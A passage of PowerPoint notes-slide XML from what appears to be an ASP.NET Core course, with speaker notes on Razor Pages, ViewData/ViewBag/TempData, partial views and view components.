            <a:endParaRPr lang="en-US" dirty="0"/>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31755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791575"/>
            <a:ext cx="2971800" cy="352425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BE9EEB41-EBB5-4D09-977D-3A6E65EE327B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3796033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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://docs.microsoft.com/en-us/aspnet/core/razor-pages/?view=aspnetcore-3.1&amp;tabs=visual-studio</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884613" y="8791575"/>
            <a:ext cx="2971800" cy="352425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{73CFBB7B-29F3-4A9F-B039-645092B1B4E9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2957885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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Explain how to add razor pages to project and configure the routing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884613" y="8791575"/>
            <a:ext cx="2971800" cy="352425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{73CFBB7B-29F3-4A9F-B039-645092B1B4E9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2957885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dirty="0"/>
              <a:t>Explain </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>how the razor page is implemented using @page directive, and previews concepts like tag-helpers, models, property binding, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PageModel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and methods like</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OnGet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OnPostAsync</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> core is the same for any approach </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mvc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and razor pages.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1489DB6A-E92B-415B-AFB4-9C72D4A9006D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1703153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dirty="0"/>
              <a:t>Create a Razor Pages app (in Visual Studio or cli: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>dotnet new razor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add a create page to submit data from a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Explain Show the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OnGet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OnPostAsync</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to capture the submitted data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1489DB6A-E92B-415B-AFB4-9C72D4A9006D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6944052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3884613" y="8791575"/>
            <a:ext cx="2971800" cy="352425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{675416BA-65F7-274A-AD61-D0FA78F3AA6E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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04067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dirty="0" err="1"/>
              <a:t>ViewData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> works with Razor Pages views</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{89920E16-7E2D-4061-8759-5F8497A7A433}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Slide Image Placeholder 7"/>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2044286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171442" marR="0" lvl="0" indent="-171442" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="116000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ViewBag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> works with Razor Pages views</a:t>
            </a:r>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pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4226824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Autofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171442" marR="0" lvl="0" indent="-171442" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="116000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>TempData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> works with Razor Pages views</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All three objects are available as properties of both the view and controller. As a rule of thumb, you will use the ViewData, ViewBag, and TempData objects for the purposes of transporting small amounts of data from and to specific locations (for example, controller to view or between views). Both the ViewData and ViewBag objects work well in the following scenarios: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Incorporating drop-down lists of lookup data into an entity </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Components like a shopping cart </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Widgets like a user profile widget </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Small amounts of aggregate data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The TempData object works well in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>one basic scenario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Passing data between the current and the next HTTP requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>TempData</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TempData is meant to be a very short-lived instance, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>you should only use it during the current and the subsequent requests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. Since TempData works this way, you need to know for sure what the next request will be, and redirecting to another view is the only time you can guarantee this. Therefore, the only scenario where using TempData will reliably work is when you are redirecting. This is because a redirect kills the current request (and sends HTTP status code 302 Object Moved to the client), then creates a new request on the server to serve the redirected view. Looking back at the previous HomeController code sample means that the TempData object could yield results differently than expected because the next request origin cannot be guaranteed. For example, the next request can originate from a completely different machine and browser instance.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The customary Session (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://msdn.microsoft.com/en-us/library/ms972429.aspx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> object is the backing store for the TempData object, and it is destroyed more quickly than a regular session, for example, immediately after the subsequent request. Because of its short lived scope, it is good for passing error messages to an error page. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{89920E16-7E2D-4061-8759-5F8497A7A433}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Slide Image Placeholder 7"/>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12557550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dirty="0"/>
              <a:t>Example: show user that you have successfully saved a page or message. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Show message from previous screen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1489DB6A-E92B-415B-AFB4-9C72D4A9006D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="118916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489DB6A-E92B-415B-AFB4-9C72D4A9006D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Slide Image Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384175" y="484188"/>
            <a:ext cx="6096000" cy="3429000"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Notes Placeholder 8"/>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64736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791575"/>
            <a:ext cx="2971800" cy="352425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BE9EEB41-EBB5-4D09-977D-3A6E65EE327B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14332963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pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Partial Views</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As developers become familiar with the ASP.NET MVC model, they will naturally want to create reusable components filled with content and code. In Web Forms, we could do this by creating a web user control or a web server control, but in MVC, we will use partial views. You will notice that conceptually, all of the scenarios below would work for either technology.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A stock ticker that is displayed on each page in an application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A calendar widget that is displayed on multiple pages in an application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A logon dialog box.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A social networking component used on multiple pages, such as a Facebook Like button.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>While ASP.NET and MVC partial views may respond similarly in theory to web user controls, however, syntactically and functionally, the two respond differently. Web user controls found in web forms uses ViewState, PostBacks, and Events while MVC partial views do not use any of the preceding techniques for managing state. Just as ASP.NET web user controls do, MVC partial views can tap into the models contained in your application as well as share data between other application components.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Source:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://rachelappel.com/razor/partial-views-in-asp-net-mvc-3-w-the-razor-view-engine/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Slide Image Placeholder 7"/>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12570445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dirty="0"/>
              <a:t>Strongly typed partial views, and then pass view model objects to be used when the partial view is rendered. By default, a strongly typed partial view will inherit the view model object from a strongly typed parent view, but you can pass a list for rendering if you want to (grid, drop-down, etc.). Rendering partial views does not invoke an action method, so the view model object for the partial view must originate in the parent view. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Partial views can be strongly typed – by default, they use the Model of their parent View.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{537ED7AC-D90E-44FA-813E-55CE8F1A06C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Image Placeholder 6"/>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1709439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791575"/>
            <a:ext cx="2971800" cy="352425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BE9EEB41-EBB5-4D09-977D-3A6E65EE327B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15194931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pPr/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34536482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normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A view component class can be created by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Deriving from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>ViewComponent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Decorating the class with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>[ViewComponent]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attribute, or deriving from a class with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>[ViewComponent]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attribute.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Creating a class where the name ends with the suffix </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>ViewComponent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Notes on the example code:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>View component classes can be contained in any folder in the project.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Because the class name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>PriorityListViewComponent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ends with the suffix </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>ViewComponent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, the runtime will use the string “PriorityList” when referencing the class component from a view. This will be discussed in more detail later.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>[ViewComponent]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attribute can change the name used to reference a view component. For example, we could have named the class XYZ, and applied the ViewComponent attribute:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[ViewComponent(Name = "PriorityList")]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>public class XYZ : ViewComponent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
